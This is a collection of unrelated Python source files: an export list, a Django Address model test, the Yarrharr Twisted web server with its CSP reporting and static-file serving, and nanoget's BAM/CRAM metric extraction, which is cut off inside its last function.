    "RehearsalMark",
    "Repeat",
    "RepeatTie",
    "Rest",
    "Right",
    "SchemeParserFinishedError",
    "Score",
    "Segment",
    "Selection",
    "Set",
    "SetClass",
    "SettingInterface",
    "Skip",
    "SlotContributions",
    "SopraninoSaxophone",
    "SopranoSaxophone",
    "SopranoVoice",
    "Staff",
    "StaffChange",
    "StaffGroup",
    "StaffPosition",
    "StartBeam",
    "StartGroup",
    "StartHairpin",
    "StartMarkup",
    "StartPhrasingSlur",
    "StartPianoPedal",
    "StartSlur",
    "StartTextSpan",
    "StartTrillSpan",
    "StemTremolo",
    "StopBeam",
    "StopGroup",
    "StopHairpin",
    "StopPhrasingSlur",
    "StopPianoPedal",
    "StopSlur",
    "StopTextSpan",
    "StopTrillSpan",
    "StringNumber",
    "Strings",
    "Tag",
    "TemporaryDirectory",
    "TemporaryDirectoryChange",
    "TenorSaxophone",
    "TenorTrombone",
    "TenorVoice",
    "Tie",
    "TimeSignature",
    "Timer",
    "Timespan",
    "TimespanList",
    "TremoloContainer",
    "Trumpet",
    "Tuba",
    "Tuning",
    "Tuplet",
    "TweakInterface",
    "TwelveToneRow",
    "TypedCollection",
    "TypedFrozenset",
    "TypedList",
    "TypedTuple",
    "UnboundedTimeIntervalError",
    "Up",
    "VerticalAlignment",
    "VerticalMoment",
    "Vibraphone",
    "Viola",
    "Violin",
    "Voice",
    "WellformednessError",
    "Wrapper",
    "Xylophone",
    "__version__",
    "__version_info__",
    "_update",
    "activate",
    "annotate",
    "attach",
    "beam",
    "deactivate",
    "deprecated",
    "detach",
    "enumerate",
    "format",
    "glissando",
    "graph",
    "hairpin",
    "horizontal_bracket",
    "illustrate",
    "illustrators",
    "index",
    "index_all",
    "index_first",
    "index_last",
    "get",
    "io",
    "iterate",
    "iterate_leaf_pairs",
    "iterate_pitch_pairs",
    "iterate_vertical_moments",
    "iterpitches",
    "label",
    "list_all_classes",
    "list_all_functions",
    "lilypond",
    "lyconst",
    "lyenv",
    "makers",
    "mutate",
    "on_beat_grace_container",
    "ottava",
    "override",
    "parse",
    "parser",
    "persist",
    "phrasing_slur",
    "piano_pedal",
    "select",
    "setting",
    "show",
    "slur",
    "string",
    "text_spanner",
    "tie",
    "trill_spanner",
    "tweak",
    "wf",
    "yield_all_modules",
]
|
"""Address model tests."""
from core.models import Address
from core.factory import AddressFactory
from tests.utils import ModelTestCase
class AddressTest(ModelTestCase):
    """Test the Address model: per-field options and string rendering."""

    # Model under test; ModelTestCase drives assertions from the
    # declarative dicts below.
    model = Address
    # Expected option values per model field. The verbose_name values are
    # the French labels declared on the model and are asserted verbatim.
    field_tests = {
        'line1': {
            'verbose_name': 'ligne 1',
            'blank': False,
            'max_length': 300,
        },
        'line2': {
            'verbose_name': 'ligne 2',
            'max_length': 300,
            'blank': True,
            'default': '',
        },
        'post_code': {
            'verbose_name': 'code postal',
            'blank': False,
            'max_length': 20,
        },
        'city': {
            'verbose_name': 'ville',
            'blank': False,
            'max_length': 100,
        },
        'country': {
            'verbose_name': 'pays',
            'blank': False,
            'default': 'FR',
        },
    }
    # Model-level (Meta) option expectations.
    model_tests = {
        'verbose_name': 'adresse',
    }

    @classmethod
    def setUpTestData(cls):
        # Shared fixture: one address; country is left to its 'FR' default.
        cls.obj = AddressFactory.create(
            line1='3 Rue Joliot Curie',
            post_code='91190',
            city='Gif-sur-Yvette',
        )

    def test_str(self):
        # str(Address) is expected to render "line1, post_code city, <country>".
        expected = '3 Rue Joliot Curie, 91190 Gif-sur-Yvette, France'
        self.assertEqual(expected, str(self.obj))
|
"""
Yarrharr production server via Twisted Web
"""
import io
import json
import logging
import os
import re
import sys
from base64 import b64encode
import attr
from django.conf import settings
from django.dispatch import receiver
from twisted.internet import defer
from twisted.internet.endpoints import serverFromString
from twisted.logger import (
FileLogObserver,
FilteringLogObserver,
ILogFilterPredicate,
Logger,
LogLevel,
PredicateResult,
formatEvent,
globalLogBeginner,
globalLogPublisher,
)
from twisted.python.filepath import FilePath
from twisted.web.resource import ErrorPage, NoResource, Resource
from twisted.web.server import Site
from twisted.web.static import File
from twisted.web.wsgi import WSGIResource
from zope.interface import implementer
from . import __version__
from .signals import schedule_changed
from .wsgi import application
log = Logger()  # Module-level twisted structured logger used throughout this module.
@attr.s
class CSPReport(object):
    """
    One Content-Security-Policy violation report as sent by a browser.

    Attribute names mirror the fields of the ``csp-report`` JSON object
    (camelCased); any attribute may be None when the browser omitted or
    blanked the corresponding field.
    """

    url = attr.ib()                 # document-uri
    referrer = attr.ib()            # referrer, or None when empty
    resource = attr.ib()            # blocked-uri
    violatedDirective = attr.ib()   # violated-directive (may be absent)
    effectiveDirective = attr.ib()  # effective-directive (may be absent)
    source = attr.ib()              # "file line:col" summary built in fromJSON
    sample = attr.ib()              # script-sample, or None when empty
    status = attr.ib()              # status-code (may be absent)
    policy = attr.ib()              # original-policy
    disposition = attr.ib()         # presumably "enforce" or "report" -- passed through as-is

    def __str__(self):
        # Render one "name=value" line per attribute, skipping unset fields.
        bits = []
        for a in attr.fields(self.__class__):
            value = getattr(self, a.name)
            if value is None:
                continue
            bits.append("{}={!r}".format(a.name, value))
        return "\n".join(bits)

    @classmethod
    def fromJSON(cls, data):
        """
        Construct a :class:`CSPReport` from the serialization of a violation
        per CSP Level 3 §5.3.
        """
        # Collapse source-file/line-number/column-number into one readable
        # string, using whichever of the optional fields are present.
        if {"source-file", "line-number", "column-number"} <= data.keys():
            source = "{source-file} {line-number}:{column-number}".format_map(data)
        elif {"source-file", "line-number"} <= data.keys():
            source = "{source-file} {line-number}".format_map(data)
        else:
            source = data.get("source-file")
        return cls(
            url=data["document-uri"],
            referrer=data["referrer"] or None,  # Always seems to be an empty string.
            resource=data["blocked-uri"],
            violatedDirective=data.get("violated-directive"),
            effectiveDirective=data.get("effective-directive"),
            policy=data["original-policy"],
            disposition=data.get("disposition"),
            status=data.get("status-code"),
            sample=data.get("script-sample") or None,
            source=source,
        )
class CSPReportLogger(Resource):
    """
    Endpoint which accepts POSTed CSP violation reports from browsers and
    writes them to the debug log (mounted at /csp-report by Root).
    """

    isLeaf = True
    _log = Logger()

    def render(self, request):
        """Validate method and content type, parse the report, log it."""
        if request.method != b"POST":
            request.setResponseCode(405)
            request.setHeader("Allow", "POST")
            return b"HTTP 405: Method Not Allowed\n"
        # NOTE(review): this compares the raw header list exactly, so a
        # Content-Type carrying parameters (e.g. "; charset=utf-8") would be
        # rejected with 415 -- confirm that is intended.
        if request.requestHeaders.getRawHeaders("Content-Type") != ["application/csp-report"]:
            request.setResponseCode(415)
            return b"HTTP 415: Only application/csp-report requests are accepted\n"
        # Process the JSON text produced per
        # https://w3c.github.io/webappsec-csp/#deprecated-serialize-violation
        report = CSPReport.fromJSON(json.load(io.TextIOWrapper(request.content, encoding="utf-8"))["csp-report"])
        if report.sample and report.sample.startswith(";(function installGlobalHook(window) {"):
            # This seems to be a misbehavior in some Firefox extension.
            # I cannot reproduce it with a clean profile.
            return b""
        if report.sample and report.sample == "call to eval() or related function blocked by CSP":
            # This is caused by Tridactyl due to a Firefox issue. It's quite
            # chatty so we'll disable for now, even though the message is
            # generated by the browser and might indicate a script injection.
            # See <https://github.com/cmcaine/tridactyl/issues/109> and
            # <https://bugzilla.mozilla.org/show_bug.cgi?id=1267027>.
            return b""
        self._log.debug(
            "Content Security Policy violation reported by {userAgent!r}:\n{report}",
            userAgent=", ".join(request.requestHeaders.getRawHeaders("User-Agent", [])),
            report=report,
        )
        return b""  # Browser ignores the response.
class FallbackResource(Resource):
    """
    A resource that delegates any request it cannot handle itself to
    a wrapped fallback resource tree.
    """

    def __init__(self, fallback):
        Resource.__init__(self)
        self.fallback = fallback

    def render(self, request):
        """
        Delegate rendering of this exact path to the fallback resource.
        """
        return self.fallback.render(request)

    def getChild(self, path, request):
        """
        Route any unmatched child path to the fallback resource.
        """
        # Rewind the traversal state so the fallback sees the request as if
        # this resource never consumed a path segment. This leans on
        # t.w.server implementation behavior rather than a public API; a
        # request-wrapping object would be the cleaner (heavier) approach.
        request.postpath.insert(0, request.prepath.pop())
        return self.fallback
class Static(Resource):
    """
    Serve up Yarrharr's static assets directory.

    In development, the files are served uncompressed and named like so::

        main-afffb00fd22ca3ce0250.js

    The second dot-delimited section is a hash of the file's contents or source
    material. As the filename changes each time the content does, these files
    are served with a long max-age and the ``immutable`` flag in the
    `Cache-Control`_ header.

    In production, each file has two pre-compressed variants: one with
    a ``.gz`` extension, and one with a ``.br`` extension. For example::

        main-afffb00fd22ca3ce0250.js
        main-afffb00fd22ca3ce0250.js.br
        main-afffb00fd22ca3ce0250.js.gz

    The actual serving of the files is done by `twisted.web.static.File`, which
    is fancy and supports range requests, conditional gets, etc.

    .. note::

        Several features used here are only available to HTTPS origins.
        Cache-Control: immutable and Brotli compression both are in Firefox.

    .. _cache-control: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control
    """

    _dir = FilePath(settings.STATIC_ROOT)
    # Asset names must look like "<name>-<hash>.<ext>[...]"; anything else 404s.
    _validName = re.compile(rb"^[a-zA-Z0-9]+-[a-zA-Z0-9]+(\.[a-z]+)+$")
    # NOTE: RFC 7231 § 5.3.4 is not completely clear about whether
    # content-coding tokens are case-sensitive or not. The "identity" token
    # appears in EBNF and is therefore definitely case-insensitive, but the
    # other tokens only appear in IANA registry tables in lowercase form. In
    # contrast, the transfer-coding possibilities are clearly defined in EBNF
    # so are definitely case-insensitive. For content-coding every implementer
    # seems to agree on lowercase, so I'm not going to worry about it.
    #
    # NOTE(review): "(:?" below looks like a typo for the non-capturing group
    # "(?:". The patterns still match the intended token boundaries, but this
    # is worth confirming and cleaning up.
    _brToken = re.compile(rb"(:?^|[\s,])br(:?$|[\s,;])")
    _gzToken = re.compile(rb"(:?^|[\s,])(:?x-)?gzip(:?$|[\s,;])")
    # Content-Type by file extension; unknown extensions produce a 404.
    _contentTypes = {
        b".js": "application/javascript",
        b".css": "text/css",
        b".map": "application/octet-stream",
        b".ico": "image/x-icon",
        b".svg": "image/svg+xml",
        b".png": "image/png",
    }

    def _file(self, path, type, encoding=None):
        """
        Construct a `twisted.web.static.File` customized to serve Yarrharr
        static assets.

        :param path: `twisted.internet.filepath.FilePath` instance
        :param type: value for the Content-Type header
        :param encoding: value for the Content-Encoding header, or None
        :returns: `twisted.web.resource.IResource`
        """
        f = File(path.path)
        f.type = type
        f.encoding = encoding
        return f

    def getChild(self, path, request):
        """
        Serve a file for the given path.

        The Content-Type header is set based on the file extension.

        A limited form of content negotiation is done based on the
        Accept-Encoding header and the files on disk. Apart from the default of
        ``identity``, two encodings are supported:

        * ``br``, which selects any Brotli-compressed ``.br`` variant of
          the file.
        * ``gzip``, which selects any gzip-compressed ``.gz`` variant of the
          file. ``x-gzip`` is also supported.

        qvalues are ignored as browsers don't use them. This may produce an
        incorrect response if a variant is disabled like ``identity;q=0``.
        """
        if not self._validName.match(path):
            return NoResource("Not found.")
        ext = path[path.rindex(b".") :]
        try:
            type = self._contentTypes[ext]
        except KeyError:
            return NoResource("Unknown type.")
        acceptEncoding = request.getHeader(b"accept-encoding") or b"*"
        file = None
        if self._brToken.search(acceptEncoding):
            br = self._dir.child(path + b".br")
            if br.isfile():
                file = self._file(br, type, "br")
        if file is None and self._gzToken.search(acceptEncoding):
            gz = self._dir.child(path + b".gz")
            if gz.isfile():
                file = self._file(gz, type, "gzip")
        if file is None:
            # Fall back to the identity (uncompressed) file.
            file = self._file(self._dir.child(path), type)
        request.setHeader(b"Vary", b"accept-encoding")
        request.setHeader(b"Cache-Control", b"public, max-age=31536000, immutable")
        return file
class Root(FallbackResource):
    """
    Root of the Yarrharr URL hierarchy.

    /csp-report and /static/* are served directly by Twisted; everything else
    falls through to the Django WSGI application.
    """

    def __init__(self, reactor, threadpool):
        wsgi = WSGIResource(reactor, threadpool, application)
        FallbackResource.__init__(self, wsgi)
        self.putChild(b"csp-report", CSPReportLogger())
        self.putChild(b"static", Static())
        # Handle requests for /favicon.ico and paths hit by script kiddies at
        # the Twisted level so that they don't make it down to Django, which
        # logs 404s as errors:
        a404 = ErrorPage(404, "Not Found", "")
        for path in (b"favicon.ico", b"index.php", b"wp-login.php"):
            self.putChild(path, a404)

    def getChildWithDefault(self, name, request):
        """Attach security headers and a per-request CSP nonce, then dispatch."""
        # Disable the Referer header in some browsers. This is complemented by
        # the injection of rel="noopener noreferrer" on all links by the HTML
        # sanitizer.
        request.setHeader(b"Referrer-Policy", b"same-origin")
        request.setHeader(b"X-Content-Type-Options", b"nosniff")
        request.setHeader(b"Cross-Origin-Opener-Policy", b"same-origin")
        # Fresh 256-bit nonce per request, stashed in a synthetic request
        # header so downstream layers can inject it into <script> tags.
        script_nonce = b64encode(os.urandom(32))
        request.requestHeaders.setRawHeaders(b"Yarrharr-Script-Nonce", [script_nonce])
        request.setHeader(
            b"Content-Security-Policy",
            (
                # b"default-src 'none'; "
                b"img-src *; "
                b"script-src 'self' 'nonce-%s'; "
                b"style-src 'self'; "
                b"frame-ancestors 'none'; "
                b"form-action 'self'; "
                b"report-uri /csp-report"
            )
            % (script_nonce,),
        )
        return super().getChildWithDefault(name, request)
def updateFeeds(reactor, max_fetch=5):
    """
    Poll any feeds due for a check.

    :param reactor: Twisted reactor passed through to the fetcher.
    :param int max_fetch: maximum number of feeds to poll in one pass.
    :returns: Deferred firing with the number of seconds until the next poll
        (as expected by :class:`AdaptiveLoopingCall`).
    """
    from .fetch import poll

    def _failed(reason):
        """
        Log unexpected errors and schedule a retry in one second.
        """
        log.failure("Unexpected failure polling feeds", failure=reason)
        return 1.0  # seconds until next poll

    d = poll(reactor, max_fetch)
    # Last gasp error handler to avoid terminating the LoopingCall.
    d.addErrback(_failed)
    return d
# Map twisted log levels to systemd/journald priority prefixes (the
# sd-daemon "<N>" syntax consumed from each line written to stderr/stdout).
_txLevelToPriority = {
    LogLevel.debug: "<7>",
    LogLevel.info: "<6>",
    LogLevel.warn: "<4>",
    LogLevel.error: "<3>",
    LogLevel.critical: "<2>",
}
def formatForSystemd(event):
    """
    Format a twisted log event as a systemd/journald-style line: a "<N>"
    priority prefix, a "[system]" tag, the rendered event text, and any
    failure traceback. Continuation lines repeat the priority prefix.

    :param dict event: twisted.logger event dictionary.
    :returns: the formatted string, or None to drop the event.
    """
    # Events generated by twisted.python.log have a "system", while ones
    # generated with twisted.logger have a "namespace" with similar
    # meaning.
    s = "[{}] ".format(event.get("log_system") or event.get("log_namespace") or "-")
    s += formatEvent(event)
    if not s:
        return None
    if "log_failure" in event:
        try:
            s += "\n" + event["log_failure"].getTraceback().rstrip("\n")
        except Exception:  # noqa -- best effort: a broken Failure must not kill logging,
            # but (fix) no longer swallow BaseException (KeyboardInterrupt etc.)
            # the way the previous bare "except:" did.
            pass
    prefix = _txLevelToPriority.get(event.get("log_level")) or "<6>"
    return prefix + s.replace("\n", "\n" + prefix + " ") + "\n"
@implementer(ILogFilterPredicate)
def dropUnhandledHTTP2Shutdown(event):
    """
    Suppress the log messages which result from an unhandled error in HTTP/2
    connection shutdown. See #282 and Twisted #9462.

    This log message is relayed from the :mod:`twisted.python.log` so the
    fields are a little odd:

    * ``'log_namespace'`` is ``'log_legacy'``, and there is a ``'system'``
      field with a value of ``'-'``.
    * ``'log_text'`` contains the actual log text, including a pre-formatted
      traceback.
    * ``'failure'`` used instead of ``'log_failure'``.
    """
    # Each guard returns "maybe" (defer to other filters) unless the event
    # positively matches the known-noisy shutdown traceback, which is dropped.
    if event.get("log_namespace") != "log_legacy":
        return PredicateResult.maybe
    if event.get("log_level") != LogLevel.critical:
        return PredicateResult.maybe
    if "failure" not in event or not event["failure"].check(AttributeError):
        return PredicateResult.maybe
    if event["log_text"].startswith("Unhandled Error") and "no attribute 'shutdown'" in event["log_text"]:
        return PredicateResult.no
    return PredicateResult.maybe
class TwistedLoggerLogHandler(logging.Handler):
    """
    Bridge stdlib ``logging`` records into the twisted.logger publisher.
    """

    publisher = globalLogPublisher

    def _mapLevel(self, levelno):
        """
        Convert a stdlib logging level into a Twisted :class:`LogLevel`.
        """
        # Walk the thresholds in ascending order; anything above ERROR
        # (and any custom level beyond it) maps to critical.
        for threshold, twistedLevel in (
            (logging.DEBUG, LogLevel.debug),
            (logging.INFO, LogLevel.info),
            (logging.WARNING, LogLevel.warn),
            (logging.ERROR, LogLevel.error),
        ):
            if levelno <= threshold:
                return twistedLevel
        return LogLevel.critical

    def emit(self, record):
        """Publish the formatted record as a twisted.logger event."""
        event = {
            "log_level": self._mapLevel(record.levelno),
            "log_namespace": record.name,
            "log_format": "{msg}",
            "msg": self.format(record),
        }
        self.publisher(event)
class AdaptiveLoopingCall(object):
    """
    :class:`AdaptiveLoopingCall` invokes a function periodically. Each time it
    is called it returns the time to wait until the next invocation.

    :ivar _clock: :class:`IReactorTime` implementer
    :ivar _f: The function to call.
    :ivar _deferred: Deferred returned by :meth:`.start()`.
    :ivar _call: `IDelayedCall` when waiting for the next poll period.
        Otherwise `None`.
    :ivar bool _poked: `True` when the function should be immediately invoked
        again after it completes.
    :ivar bool _stopped: `True` once `stop()` has been called.
    """

    _deferred = None
    _call = None
    _poked = False
    _stopped = False

    def __init__(self, clock, f):
        """
        :param clock: :class:`IReactorTime` provider to use when scheduling
            calls.
        :param f: The function to call when the loop is started. It must return
            the number of seconds to wait before calling it again, or
            a deferred for the same.
        """
        self._clock = clock
        self._f = f

    def start(self):
        """
        Call the function immediately, and schedule future calls according to
        its result.

        :returns:
            :class:`Deferred` which will succeed when :meth:`stop()` is called
            and the loop cleanly exits, or fail when the function produces
            a failure.
        """
        assert self._deferred is None
        assert self._call is None
        assert not self._stopped
        self._deferred = d = defer.Deferred()
        self._callIt()
        return d

    def stop(self):
        # Stop the loop. If we are sleeping between calls, cancel the timer
        # and resolve the start() deferred now; if a call is in flight,
        # _schedule() notices _stopped and resolves it on completion.
        self._stopped = True
        if self._call:
            self._call.cancel()
            self._deferred.callback(self)

    def poke(self):
        """
        Run the function as soon as possible: either immediately or once it has
        finished any current execution. This is a no-op if the service has been
        stopped. Pokes coalesce if received while the function is executing.
        """
        if self._stopped or self._poked:
            return
        if self._call:
            # Sleeping between calls: cancel the pending timer and run now.
            self._call.cancel()
            self._callIt()
        else:
            # A call is in progress: flag it to run again once it finishes.
            self._poked = True

    def _callIt(self):
        # Invoke the wrapped function; its (possibly deferred) result is the
        # number of seconds to wait before the next invocation.
        self._call = None
        d = defer.maybeDeferred(self._f)
        d.addCallback(self._schedule)
        d.addErrback(self._failLoop)

    def _schedule(self, seconds):
        """
        Schedule the next call.
        """
        assert isinstance(seconds, (int, float))
        if self._stopped:
            # stop() was called while the function ran: resolve start()'s
            # deferred instead of scheduling another call.
            d, self._deferred = self._deferred, None
            d.callback(self)
        elif self._poked:
            # A poke arrived while the function ran: run again immediately.
            self._poked = False
            self._callIt()
        else:
            self._call = self._clock.callLater(seconds, self._callIt)

    def _failLoop(self, failure):
        """
        Terminate the loop due to an unhandled failure.
        """
        d, self._deferred = self._deferred, None
        d.errback(failure)
def run():
    """
    Configure logging, set up the HTTP endpoint and the feed-polling loop,
    and run the Twisted reactor until shutdown.
    """
    from twisted.internet import reactor

    # Route stdlib logging through twisted.logger, then out to stdout in
    # systemd/journald format.
    root = logging.getLogger()
    logging.getLogger("django").setLevel(logging.INFO)
    logging.raiseExceptions = settings.DEBUG
    logging._srcfile = None  # Disable expensive collection of location information.
    root.setLevel(logging.DEBUG if settings.DEBUG else logging.INFO)
    root.addHandler(TwistedLoggerLogHandler())
    observer = FilteringLogObserver(
        FileLogObserver(sys.stdout, formatForSystemd),
        [dropUnhandledHTTP2Shutdown],
    )
    globalLogBeginner.beginLoggingTo([observer], redirectStandardIO=False)

    log.info("Yarrharr {version} starting", version=__version__)

    factory = Site(Root(reactor, reactor.getThreadPool()), logPath=None)
    endpoint = serverFromString(reactor, settings.SERVER_ENDPOINT)
    reactor.addSystemEventTrigger("before", "startup", endpoint.listen, factory)

    # Background feed-polling loop; poked whenever the schedule changes.
    updateLoop = AdaptiveLoopingCall(reactor, lambda: updateFeeds(reactor))
    loopEndD = updateLoop.start()
    loopEndD.addErrback(lambda f: log.failure("Polling loop broke", f))

    @receiver(schedule_changed)
    def threadPollNow(sender, **kwargs):
        """
        When the `schedule_changed` signal is sent poke the polling loop. If it
        is sleeping this will cause it to poll immediately. Otherwise this will
        cause it to run the poll function immediately once it returns (running
        it again protects against races).
        """
        log.debug("Immediate poll triggered by {sender}", sender=sender)
        reactor.callFromThread(updateLoop.poke)

    def stopUpdateLoop():
        # Let any in-flight poll finish before the reactor shuts down.
        updateLoop.stop()
        return loopEndD

    reactor.addSystemEventTrigger("before", "shutdown", stopUpdateLoop)

    reactor.run()
|
import logging
from functools import reduce
import nanoget.utils as ut
import pandas as pd
import sys
import pysam
import re
from Bio import SeqIO
import concurrent.futures as cfutures
from itertools import repeat
def process_summary(summaryfile, **kwargs):
    """Extracting information from an albacore summary file.

    Only reads which have a >0 length are returned.

    Requires kwargs "readtype" ("1D", "2D" or "1D2") and "barcoded" (bool).
    Returns a pandas DataFrame with columns channelIDs/time/duration/
    lengths/quals (+ barcode when barcoded), memory-reduced via ut.

    The fields below may or may not exist, depending on the type of sequencing performed.
    Fields 1-14 are for 1D sequencing.
    Fields 1-23 for 2D sequencing.
    Fields 24-27, 2-5, 22-23 for 1D^2 (1D2) sequencing
    Fields 28-38 for barcoded workflows
     1  filename
     2  read_id
     3  run_id
     4  channel
     5  start_time
     6  duration
     7  num_events
     8  template_start
     9  num_events_template
    10  template_duration
    11  num_called_template
    12  sequence_length_template
    13  mean_qscore_template
    14  strand_score_template
    15  complement_start
    16  num_events_complement
    17  complement_duration
    18  num_called_complement
    19  sequence_length_complement
    20  mean_qscore_complement
    21  strand_score_complement
    22  sequence_length_2d
    23  mean_qscore_2d
    24  filename1
    25  filename2
    26  read_id1
    27  read_id2
    28  barcode_arrangement
    29  barcode_score
    30  barcode_full_arrangement
    31  front_score
    32  rear_score
    33  front_begin_index
    34  front_foundseq_length
    35  rear_end_index
    36  rear_foundseq_length
    37  kit
    38  variant
    """
    logging.info("Nanoget: Collecting metrics from summary file {} for {} sequencing".format(
        summaryfile, kwargs["readtype"]))
    ut.check_existance(summaryfile)
    if kwargs["readtype"] == "1D":
        cols = ["channel", "start_time", "duration",
                "sequence_length_template", "mean_qscore_template"]
    elif kwargs["readtype"] in ["2D", "1D2"]:
        cols = ["channel", "start_time", "duration", "sequence_length_2d", "mean_qscore_2d"]
    else:
        # Fix: an unrecognized readtype previously fell through and crashed
        # later with a NameError on `cols`; fail early with a clear message.
        logging.error("Nanoget: unsupported readtype {} for summary file {}".format(
            kwargs["readtype"], summaryfile))
        sys.exit("ERROR: unsupported readtype {}: expected 1D, 2D or 1D2".format(
            kwargs["readtype"]))
    if kwargs["barcoded"]:
        cols.append("barcode_arrangement")
        logging.info("Nanoget: Extracting metrics per barcode.")
    try:
        datadf = pd.read_csv(
            filepath_or_buffer=summaryfile,
            sep="\t",
            usecols=cols,
        )
    except ValueError:
        logging.error("Nanoget: did not find expected columns in summary file {}:\n {}".format(
            summaryfile, ', '.join(cols)))
        sys.exit("ERROR: expected columns in summary file {} not found:\n {}".format(
            summaryfile, ', '.join(cols)))
    # Rename to nanoget's canonical column names (order matches `cols`).
    if kwargs["barcoded"]:
        datadf.columns = ["channelIDs", "time", "duration", "lengths", "quals", "barcode"]
    else:
        datadf.columns = ["channelIDs", "time", "duration", "lengths", "quals"]
    logging.info("Nanoget: Finished collecting statistics from summary file {}".format(summaryfile))
    # Drop zero-length reads before reducing memory usage.
    return ut.reduce_memory_usage(datadf.loc[datadf["lengths"] != 0].copy())
def check_bam(bam, samtype="bam"):
    """Check if bam file is valid.

    Bam file should:
    - exists
    - has an index (create if necessary)
    - is sorted by coordinate
    - has at least one mapped read

    Returns the opened :class:`pysam.AlignmentFile`; exits the process on
    any validation failure.
    """
    ut.check_existance(bam)
    samfile = pysam.AlignmentFile(bam, "rb")
    if not samfile.has_index():
        pysam.index(bam)
        samfile = pysam.AlignmentFile(bam, "rb")  # Need to reload the samfile after creating index
        logging.info("Nanoget: No index for bam file could be found, created index.")
    if not samfile.header['HD']['SO'] == 'coordinate':
        logging.error("Nanoget: Bam file {} not sorted by coordinate!.".format(bam))
        sys.exit("Please use a bam file sorted by coordinate.")
    if samtype == "bam":
        # The mapped/unmapped counts are only checked for bam input;
        # cram callers (samtype="cram") skip this block.
        logging.info("Nanoget: Bam file {} contains {} mapped and {} unmapped reads.".format(
            bam, samfile.mapped, samfile.unmapped))
        if samfile.mapped == 0:
            logging.error("Nanoget: Bam file {} does not contain aligned reads.".format(bam))
            sys.exit("FATAL: not a single read was mapped in bam file {}".format(bam))
    return samfile
def process_ubam(bam, **kwargs):
    """Extracting metrics from unaligned bam format
    Extracting lengths

    Returns a DataFrame with readIDs/quals/lengths columns.
    check_sq=False presumably because an unaligned bam lacks @SQ header
    lines -- confirm against pysam docs.
    """
    logging.info("Nanoget: Starting to collect statistics from ubam file {}.".format(bam))
    samfile = pysam.AlignmentFile(bam, "rb", check_sq=False)
    if not samfile.has_index():
        pysam.index(bam)
        # Need to reload the samfile after creating index
        samfile = pysam.AlignmentFile(bam, "rb", check_sq=False)
        logging.info("Nanoget: No index for bam file could be found, created index.")
    datadf = pd.DataFrame(
        data=[(read.query_name, ut.ave_qual(read.query_qualities), read.query_length)
              for read in samfile.fetch(until_eof=True)],
        columns=["readIDs", "quals", "lengths"]) \
        .dropna(axis='columns', how='all') \
        .dropna(axis='index', how='any')
    logging.info("Nanoget: ubam {} contains {} reads.".format(
        bam, datadf["lengths"].size))
    return ut.reduce_memory_usage(datadf)
def process_bam(bam, **kwargs):
    """Combines metrics from bam after extraction.

    Processing function: calls pool of worker functions
    to extract from a bam file the following metrics:
    -lengths
    -aligned lengths
    -qualities
    -aligned qualities
    -mapping qualities
    -edit distances to the reference genome scaled by read length
    Returned in a pandas DataFrame

    Requires kwargs "huge" (bool), "threads" (int) and "keep_supp" (bool).
    """
    logging.info("Nanoget: Starting to collect statistics from bam file {}.".format(bam))
    samfile = check_bam(bam)
    chromosomes = samfile.references
    if len(chromosomes) > 100 or kwargs["huge"]:
        # Many contigs (or --huge): a single in-process pass over the whole
        # file (chromosome=None) instead of one worker per contig.
        logging.info("Nanoget: lots of contigs (>100) or --huge, not running in separate processes")
        datadf = pd.DataFrame(
            data=extract_from_bam(bam, None, kwargs["keep_supp"]),
            columns=["readIDs", "quals", "aligned_quals", "lengths",
                     "aligned_lengths", "mapQ", "percentIdentity"]) \
            .dropna(axis='columns', how='all') \
            .dropna(axis='index', how='any')
    else:
        # One worker process per chromosome; flatten the per-contig lists.
        unit = chromosomes
        with cfutures.ProcessPoolExecutor(max_workers=kwargs["threads"]) as executor:
            datadf = pd.DataFrame(
                data=[res for sublist in executor.map(extract_from_bam,
                                                      repeat(bam),
                                                      unit,
                                                      repeat(kwargs["keep_supp"]))
                      for res in sublist],
                columns=["readIDs", "quals", "aligned_quals", "lengths",
                         "aligned_lengths", "mapQ", "percentIdentity"]) \
                .dropna(axis='columns', how='all') \
                .dropna(axis='index', how='any')
    logging.info(f"Nanoget: bam {bam} contains {datadf['lengths'].size} primary alignments.")
    return ut.reduce_memory_usage(datadf)
def process_cram(cram, **kwargs):
    """Combines metrics from cram after extraction.

    Processing function: calls pool of worker functions
    to extract from a cram file the following metrics:
    -lengths
    -aligned lengths
    -qualities
    -aligned qualities
    -mapping qualities
    -edit distances to the reference genome scaled by read length
    Returned in a pandas DataFrame

    Requires kwargs "threads" (int) and "keep_supp" (bool).
    """
    logging.info("Nanoget: Starting to collect statistics from cram file {}.".format(cram))
    samfile = check_bam(cram, samtype="cram")
    chromosomes = samfile.references
    if len(chromosomes) > 100:
        # Too many contigs: a single worker over the whole file instead of
        # one per contig (chromosome=None in extract_from_bam).
        unit = [None]
        logging.info("Nanoget: lots of contigs (>100), not running in separate processes")
    else:
        unit = chromosomes
    with cfutures.ProcessPoolExecutor(max_workers=kwargs["threads"]) as executor:
        # Flatten the per-contig result lists into one list of tuples.
        datadf = pd.DataFrame(
            data=[res for sublist in executor.map(extract_from_bam,
                                                  repeat(cram), unit, repeat(kwargs["keep_supp"]))
                  for res in sublist],
            columns=["readIDs", "quals", "aligned_quals", "lengths",
                     "aligned_lengths", "mapQ", "percentIdentity"]) \
            .dropna(axis='columns', how='all') \
            .dropna(axis='index', how='any')
    logging.info(f"Nanoget: cram {cram} contains {datadf['lengths'].size} primary alignments.")
    return ut.reduce_memory_usage(datadf)
def extract_from_bam(bam, chromosome, keep_supplementary=True):
    """Extracts metrics from bam.

    Worker function per chromosome (chromosome=None scans the whole file).
    Returns a list of per-read tuples:
    (name, avg quality, avg aligned quality, length, aligned length,
    mapping quality, percent identity).
    """
    samfile = pysam.AlignmentFile(bam, "rb")

    def _eligible(read):
        # Primary mapped reads only; supplementary alignments are included
        # or excluded according to keep_supplementary.
        if read.is_secondary or read.is_unmapped:
            return False
        return keep_supplementary or not read.is_supplementary

    return [
        (read.query_name,
         ut.ave_qual(read.query_qualities),
         ut.ave_qual(read.query_alignment_qualities),
         read.query_length,
         read.query_alignment_length,
         read.mapping_quality,
         get_pID(read))
        for read in samfile.fetch(reference=chromosome, multiple_iterators=True)
        if _eligible(read)]
def get_pID(read):
    """Return the percent identity of a read.

    Based on the NM tag if present, otherwise calculated from the MD tag
    and CIGAR string. Returns None when identity cannot be determined.

    read.query_alignment_length can be zero in the case of ultra long reads
    aligned with minimap2 -L; the alignment length computed from the CIGAR
    can likewise be zero, in which case None is returned.
    """
    # Alignment length = matches (ops 0/7/8) + insertions (1) + deletions (2).
